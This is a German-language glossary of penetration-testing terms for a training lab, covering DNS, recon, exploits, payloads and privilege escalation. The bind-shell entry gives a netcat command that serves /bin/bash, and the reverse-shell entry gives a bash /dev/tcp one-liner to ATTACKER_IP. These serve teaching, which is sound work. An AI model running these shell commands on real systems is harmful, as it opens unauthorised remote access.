Glossar (Begrifflichkeiten)¶
Dieses Glossar erklärt wichtige technische Begriffe, die im Rahmen des LABs und im Pentesting-Kontext verwendet werden.
A¶
Abuse-Mailbox¶
Eine Abuse-Mailbox ist eine speziell vorgesehene Kontaktadresse für sicherheitsrelevante Meldungen wie Missbrauch, Spam oder Sicherheitsvorfälle.
Ziele: - Melden von sicherheitskritischen Beobachtungen (z. B. kompromittierte Systeme) - Finden offizieller Ansprechpartner während eines Pentests oder Responsible Disclosure - Überprüfen, ob ein Anbieter korrekt durch RFC-Standards erreichbar ist
Beispiel: abuse@example.com
Angriffskette (Kill Chain)¶
Abfolge von Schritten, die ein Angreifer durchläuft, um ein Ziel zu kompromittieren.
Angriffsvektoren¶
Angriffsvektoren sind die möglichen Wege, über die ein Angreifer Zugriff auf ein System, Netzwerk oder eine Anwendung erlangen kann. Sie beschreiben die Pfade, Schwachstellen oder Mechanismen, die ausgenutzt werden können.
Ziele: - Identifikation potenzieller Einstiegspunkte - Priorisierung von Risiken und Schwachstellen - Verbesserung der Sicherheitsarchitektur durch Schliessen von Angriffspfaden
Typische Angriffsvektoren: - Technische Schwachstellen (z. B. ungepatchte Software, offene Ports) - Social Engineering (z. B. Phishing) - Fehlkonfigurationen (z. B. unsichere Cloud-Buckets) - Schwache Zugangsdaten (z. B. Default-Passwörter) - Physische Angriffe (z. B. Zugriff auf Hardware)
Beispiel: Ein offener RDP-Port mit schwachem Passwort dient als direkter Angriffsvektor für einen Brute-Force-Angriff.
AS-Nummer¶
Eine AS-Nummer (Autonomous System Number, ASN) identifiziert ein eigenständiges autonomes Netzwerk im Internet.
Sie wird Betreibern wie ISPs, grossen Unternehmen oder Cloud-Anbietern zugewiesen.
Ziele: - Zuordnung von IP-Adressbereichen zu einem Betreiber - Analyse der Netzstruktur und Routing-Beziehungen - Unterstützung bei Recon-Phasen (z. B. Identifikation aller zugehörigen Netze)
Beispiel: AS15169 → Google LLC
Asset¶
Ein System, Dienst, Benutzerkonto oder Datenbestand, der geschützt werden muss.
Authentication (Authentifizierung)¶
Nachweis der Identität eines Benutzers oder Systems, z. B. durch Passwort oder Zertifikat.
Autoritativer Nameserver¶
Ein autoritativer Nameserver ist ein DNS-Server, der offizielle und verbindliche Informationen für eine bestimmte Domain bereithält. Er liefert endgültige Antworten auf DNS-Anfragen, da er die Zone-Daten selbst verwaltet.
Aufgaben: - Speichern und Bereitstellen der DNS-Zonendaten einer Domain - Liefern verbindlicher Antworten (Authoritative Answers) - Verwaltung von A-, AAAA-, MX-, CNAME-, TXT- und weiteren DNS-Einträgen
Beispiel: Der autoritative Nameserver für example.com liefert die offizielle IP-Adresse für die Domain.
B¶
Backdoor¶
Eine Backdoor ist ein absichtlich versteckter oder heimlich eingebauter Zugang zu einem System, der Sicherheitsmechanismen umgeht.
Angreifer nutzen Backdoors, um:
- später erneut ins System zu gelangen
- ohne Exploit wieder Zugriff zu bekommen
- dauerhaft Kontrolle zu behalten
Beispiele:
- versteckter Benutzer mit Adminrechten
- persistent installierter Remote-Zugriff
- manipulierte Systemdienste oder Cronjobs
Banner-Grabbing¶
Banner-Grabbing bezeichnet das Auslesen von Informationsbannern, die Dienste beim Verbindungsaufbau preisgeben.
Diese Banner enthalten oft Details wie Softwareversionen, Betriebssysteminformationen oder Konfigurationshinweise.
Ziele: - Identifikation von Diensten und Versionen - Erkennen potenziell verwundbarer Software - Unterstützung bei der Angriffsvorbereitung
Beispiele für Tools: nc, nmap, curl
Beispiel: Ein HTTP-Server gibt „Apache/2.4.41 (Ubuntu)“ im Header zurück.
Bind Shells¶
Eine Bind Shell ist eine Shell, die auf dem kompromittierten System an einen Port gebunden wird.
Der Angreifer verbindet sich anschliessend direkt zu diesem Port, um Zugriff zu erhalten.
Ziele: - Bereitstellung eines direkten Remote-Zugangs - Schnelles Öffnen eines Zugriffswegs bei weniger restriktiven Firewalls
Funktionsweise:
Das Zielsystem öffnet einen Port → wartet auf eingehende Verbindung → Angreifer verbindet sich und erhält eine Shell.
Beispiel: nc -lvp 4444 -e /bin/bash
Blackbox-Test¶
Pentest ohne Vorwissen über das Zielsystem – durchgeführt wie ein externer Angreifer.
Brute-Force¶
Automatisiertes Durchprobieren vieler möglicher Passwörter oder Schlüssel.
C¶
Compliance¶
Einhaltung gesetzlicher, vertraglicher oder branchenspezifischer Vorgaben (z. B. DSGVO, PCI DSS).
Credentialed Scan¶
Ein credentialed Scan ist ein Sicherheits- oder Schwachstellenscan, bei dem sich das Scanning-Tool mit gültigen Benutzerkonten am Zielsystem anmeldet.
Dadurch erhält der Scanner viel detailliertere Informationen als bei einem anonymen Scan.
Vorteile:
- Erkennung tieferliegender Schwachstellen
- Prüfung von Konfigurationen
- Genauere Risikoanalyse
Beispiel: Scan eines Servers mit gültigem „vagrant“-Login in der LAB-Umgebung.
D¶
Denial of Service (DoS)¶
Angriff, der ein System durch Überlastung funktionsunfähig macht.
DNS¶
Das Domain Name System (DNS) ist ein hierarchisches Namensauflösungssystem, das Domainnamen in IP-Adressen übersetzt.
Ziele: - Zuordnung von Domainnamen zu IP-Adressen - Erleichterung der Kommunikation zwischen Clients und Servern - Strukturierte Verwaltung von Domains und Subdomains
Beispiele für Tools: dig, nslookup, host
Beispiel: Die Domain example.com wird zu 93.184.216.34 aufgelöst.
DNS Answer¶
Die DNS Answer ist die Antwort eines DNS-Servers auf eine DNS-Anfrage. Sie enthält die angeforderten Informationen über einen Domainnamen.
Inhalte einer Antwort: - IP-Adresse einer Domain - CNAME-Einträge - MX-Einträge - TTL-Informationen
Beispiel: Antwort: example.com → 93.184.216.34
DNS Query¶
Eine DNS Query ist die Anfrage eines Clients an einen DNS-Server, um Informationen zu einem Domainnamen zu erhalten.
Arten von Queries: - Recursive Query: Der DNS-Server muss eine vollständige Antwort liefern. - Iterative Query: Der DNS-Server gibt die beste bekannte Antwort zurück und verweist ggf. auf andere Server.
Beispiel: Ein Client fragt: „Wie lautet die IP-Adresse von example.com?“
DNS Resolver¶
Der DNS Resolver ist die Komponente, die DNS-Anfragen entgegennimmt, verarbeitet und DNS-Server kontaktiert.
Aufgaben: - Entgegennahme von DNS-Anfragen des Clients - Weiterleitung der Anfragen an DNS-Server - Caching der Antworten zur Beschleunigung zukünftiger Anfragen
Beispiel: Der Resolver deines ISP löst example.com aus dem Cache auf.
DNSSEC¶
DNSSEC (DNS Security Extensions) erweitert DNS um kryptografische Signaturen, um Manipulationen zu verhindern.
Ziele: - Prüfen kryptografischer Signaturen und Vertrauenskette - Schutz vor DNS-Spoofing und Cache Poisoning
Risiken bei Fehlkonfiguration: - Domains nicht mehr erreichbar - Potenzielle DoS-Effekte durch grosse Antwortpakete
E¶
Enumeration¶
Aktive Informationsgewinnung aus gefundenen Diensten (z. B. Benutzer, Freigaben, Versionen).
Die Enumeration geht tiefer als das reine Scanning.
Hier versucht der Pentester, aktiv verwertbare Informationen aus Diensten oder Protokollen zu extrahieren.
Ziele: - Benutzer- und Gruppeninformationen sammeln - Freigaben oder Ordnerstrukturen entdecken - Konfigurationsdetails oder Banner auslesen - Schwachstellenrelevante Daten gewinnen
Beispiele für Tools: enum4linux, smbclient, ldapsearch, nikto
Beispiel: Eine SMB-Freigabe „public“ ist ohne Passwort zugänglich.
Exploit¶
Ein Exploit ist ein Werkzeug oder Code, der eine spezifische Schwachstelle ausnutzt.
Er ist also das technische Mittel, z. B.:
- ein Skript
- ein Metasploit-Modul
- ein Proof-of-Concept
- eine manipulierte Eingabe
Der Exploit führt die Schwachstelle aus, aber nicht unbedingt den Angriff selbst zu Ende.
Beispiel:
Ein Metasploit-Modul, das eine Lücke in SMB ausnutzt.
Exploitation¶
Exploitation bezeichnet den Prozess des tatsächlichen Ausnutzens einer Schwachstelle — also den gesamten Angriffsvorgang.
Es ist der Ablauf, bei dem ein Angreifer:
- den Exploit ausführt
- erfolgreich Code ausführt, Zugriff erhält oder Rechte eskaliert
- seine Ziele erreicht (z. B. Shell, Datenzugriff, Kontrolle)
Exploitation ist also die Aktion, Exploit das Werkzeug.
In der Exploitation-Phase werden gefundene Schwachstellen tatsächlich ausgenutzt.
Ziele: - Remote Code Execution - Privilege Escalation - Zugriff auf Daten oder Systeme - Umgehen von Authentifizierungen
Beispiele für Tools: Metasploit, msfvenom, Exploits von exploit-db
Beispiel: Ausnutzen einer SMB-Schwachstelle (z. B. EternalBlue), um Zugriff zu erhalten.
F¶
Firewall¶
System zur Filterung von Netzwerkverkehr basierend auf Regeln wie Ports, Protokollen oder IP-Adressen.
Firewall-Evasion¶
Firewall-Evasion bezeichnet Techniken, mit denen Sicherheitsmechanismen wie Firewalls oder Intrusion-Detection-Systeme umgangen oder getäuscht werden, um Zugriff auf Systeme oder Dienste zu erhalten.
Ziele: - Umgehen von Filterregeln und Zugriffsbeschränkungen - Tarnen oder Verschleiern von Netzwerkverkehr - Ermöglichen von Scans oder Verbindungen trotz restriktiver Regeln
Typische Methoden: - Fragmentierung von Paketen (z. B. TCP-Fragmentation) - Nutzung unüblicher Ports oder Port-Knocking - Tarnen von Protokollen (z. B. SSH über DNS oder HTTPS) - Nutzung von Tunneling (z. B. ICMP-, DNS- oder HTTP-Tunnel) - Slow-Rate- oder Timing-basierte Angriffe zur Umgehung von Erkennungsmechanismen
Beispiel: Ein Scan mit fragmentierten Paketen, um eine Stateful-Firewall zu umgehen, die normale TCP-SYN-Pakete blockiert.
Fuzzing¶
Testmethode, die Anwendungen mit zufälligen oder ungültigen Eingaben konfrontiert, um Fehler oder Schwachstellen zu finden.
G¶
Grey-Box-Test¶
Pentest mit teilweise vorhandenen Informationen über das Ziel (z. B. logins, Architekturdetails).
I¶
IDS¶
Ein Intrusion Detection System (IDS) ist ein Sicherheitssystem, das Netzwerk- oder Systemaktivitäten überwacht, um Angriffe, Anomalien oder unerwünschtes Verhalten zu erkennen.
Es reagiert jedoch nicht aktiv, sondern alarmiert lediglich.
Ziele: - Erkennen von Angriffsmustern und verdächtigen Aktivitäten - Frühzeitige Warnung bei möglichen Sicherheitsvorfällen - Überwachung von Netzwerktraffic oder Hostsystemen
Typische Arten: - NIDS (Network IDS): Überwachung des Netzwerkverkehrs - HIDS (Host IDS): Überwachung einzelner Systeme
Beispiel: Erkennen eines Portscans oder ungewöhnlicher Login-Versuche.
IPS¶
Ein Intrusion Prevention System (IPS) ist ein erweitertes IDS, das nicht nur Angriffe erkennt, sondern aktiv eingreift, um diese zu blockieren oder abzumildern.
Ziele: - Automatisches Verhindern erkannter Angriffe - Blockieren schädlicher Pakete oder Verbindungen - Schutz vor Exploits, Malware, Portscans oder Protokollmissbrauch
Typische Funktionen: - Dropping/Blocking verdächtiger Pakete - Dynamische Änderung von Firewall-Regeln - Rate-Limiting oder Session-Termination
Beispiel: Ein IPS blockiert eine SQL-Injection-Anfrage in Echtzeit.
Intelligence Gathering¶
Frühe PTES-Phase: Sammlung grundlegender Informationen über Zielsysteme und Infrastruktur.
L¶
Load Balancer¶
System zur automatischen Lastverteilung über mehrere Server, um Stabilität und Performance zu erhöhen.
M¶
N¶
Netzwerk-Scanning¶
Automatisierte Erkennung von Geräten, offenen Ports und laufenden Diensten in einem Netzwerk.
P¶
Payload¶
Eine Payload ist der Teil eines Exploits, der nach der erfolgreichen Ausnutzung einer Schwachstelle ausgeführt wird.
Sie ist die „Nutzlast“, die der Angreifer eigentlich platzieren möchte.
Beispiele:
- Reverse Shell
- Meterpreter-Session
- Backdoor installieren
- Benutzerkonto anlegen
Der Exploit ≠ Payload → Der Exploit verschafft den Zugang, die Payload nutzt ihn aus.
Peering-Punkte¶
Peering-Punkte (Internet Exchange Points, IXPs) sind Knotenpunkte, an denen verschiedene Netzbetreiber Daten direkt miteinander austauschen.
Ziele: - Analyse der Netzwerkverbindungen eines Unternehmens - Identifikation von Traffic-Flows und möglichen Angriffspfaden - Verständnis über die Internet-Topologie des Ziels
Beispiel: DE-CIX, AMS-IX, LINX
Penetrationstest (Pentest)¶
Simulierter Angriff zur Identifikation von Schwachstellen in Systemen, Anwendungen oder Netzwerken.
Privilege Escalation (Rechteausweitung)¶
Privilege Escalation beschreibt den Vorgang, bei dem ein Angreifer seine ursprünglich geringen Rechte auf einem System auf höhere oder vollständige Berechtigungen ausweitet.
Es gibt zwei Hauptformen:
-
Vertical Privilege Escalation:
Ein Benutzer mit niedrigen Rechten (z. B. „User“) erlangt höhere Rechte (z. B. „Administrator“ oder „root“). -
Horizontal Privilege Escalation:
Ein Benutzer erhält Zugriff auf Bereiche oder Daten eines anderen Benutzers mit gleicher Berechtigungsstufe.
Privilege Escalation wird oft nach einem ersten Systemzugriff genutzt, um vollständige Kontrolle zu erlangen oder tiefer ins Netzwerk einzudringen.
PTES (Penetration Testing Execution Standard)¶
Internationaler Standard zur strukturierten Durchführung von Penetrationstests.
R¶
Recon¶
Recon (Reconnaissance) bezeichnet die Informationsbeschaffung über ein Ziel, bevor aktive Angriffe oder Tests durchgeführt werden. Es ist eine der ersten Phasen eines Pentests.
Ziele: - Sammeln öffentlich verfügbarer Informationen - Identifikation von Systemen, Diensten und Angriffsflächen - Minimierung aktiver Spuren durch passive Methoden
Arten von Recon: - Passive Recon: Nutzung öffentlich verfügbarer Daten (OSINT), ohne direkten Kontakt zum Ziel. - Active Recon: Direkte Interaktion mit dem Ziel, z. B. Scans und Abfragen.
Beispiele für Tools: amass, subfinder, theHarvester, shodan, nmap
Beispiel: Auffinden verborgener Subdomains über OSINT-Quellen.
Red Team¶
Simuliert realistische Angriffe, bei denen Tarnung und langfristige Kompromittierung im Fokus stehen.
Remote Code Execution (RCE)¶
Remote Code Execution bezeichnet eine Schwachstelle, die es einem Angreifer ermöglicht, beliebigen Code auf einem entfernten System auszuführen, ohne physischen Zugriff auf das Gerät zu haben.
Dies gehört zu den kritischsten Angriffstypen, da der Angreifer dadurch häufig:
- Programme starten
- Dateien lesen, verändern oder löschen
- weitere Systeme im Netzwerk angreifen
- vollständige Kontrolle über das System erlangen
RCE entsteht typischerweise durch unsichere Eingabevalidierung, fehlerhafte Webanwendungen oder verwundbare Netzwerkdienste.
Reverse DNS¶
Reverse DNS (rDNS) dient der Auflösung einer IP-Adresse zu einem Hostnamen (IP → Hostname).
Wird häufig verwendet, um Systeme zu identifizieren oder Vertrauen in Mailserver herzustellen.
Ziele: - Identifikation interner oder unbekannter Systeme - Überprüfung von Infrastrukturzugehörigkeiten - Unterstützung bei Forensik und Logging
Beispiel: 93.184.216.34 → example.com
Reverse Shells¶
Eine Reverse Shell ist eine Shell-Verbindung, bei der sich der kompromittierte Host aktiv zu einem Angreifer verbindet.
Sie wird eingesetzt, wenn eingehende Verbindungen blockiert werden (z. B. durch Firewalls).
Ziele: - Umgehen restriktiver Firewall-Regeln - Aufbau einer interaktiven Remote-Shell
Funktionsweise:
Das Zielsystem initiiert die Verbindung → Angreifer lauscht auf einem Port → Shell wird übertragen.
Beispiel: bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
S¶
Scanning¶
Beim Scanning werden grundlegende Informationen über das Zielnetz gesammelt.
Ziele: - Ermitteln, welche Hosts erreichbar sind - Auffinden offener Ports - Identifizieren laufender Dienste - Erkennen von Dienstversionen
Beispiele für Tools: nmap, masscan, rustscan
Beispiel: Offener SSH-Port auf Port 22 wird gefunden.
Scope¶
Der vereinbarte Umfang eines Tests, z. B. IP-Bereiche, Systeme oder Anwendungen.
Scope Creep¶
Ungeplante Erweiterung des Testumfangs während eines Projekts.
Snapshot¶
Gespeicherter Zustand einer virtuellen Maschine, zu dem jederzeit zurückgekehrt werden kann.
SPF / DMARC¶
SPF (Sender Policy Framework) und DMARC (Domain-based Message Authentication, Reporting and Conformance) sind E-Mail-Authentifizierungsmechanismen.
Ziele: - Analyse der E-Mail-Infrastruktur - Erkennen von Schwachstellen im Mail-Setup
Relevanz im Pentest: - Aufdecken von Mail-Spoofing-Möglichkeiten - Unterstützung von Social-Engineering-Analysen
Split DNS¶
Split DNS beschreibt eine Infrastruktur, in der interne und externe DNS-Antworten unterschiedlich sind.
Ziele: - Unterscheiden von internen und externen Namensauflösungen - Prüfen, ob interne Systeme versehentlich extern sichtbar sind
Risiko:
Fehlkonfigurationen können dazu führen, dass interne Hosts ungewollt extern exponiert werden.
W¶
White-Box-Test¶
Pentest mit vollständigen internen Informationen (z. B. Quellcode, Netzwerkpläne).
Wildcard DNS¶
Wildcard DNS sorgt dafür, dass beliebige (nicht existierende) Subdomains einer Domain aufgelöst werden.
Ziele: - Prüfen, ob eine Wildcard-Konfiguration aktiv ist - Identifizieren von Hindernissen für Subdomain-Scanning
Problem:
Wildcard-DNS verhindert oder verfälscht klassische Subdomain-Enumeration, da alles eine Antwort liefert.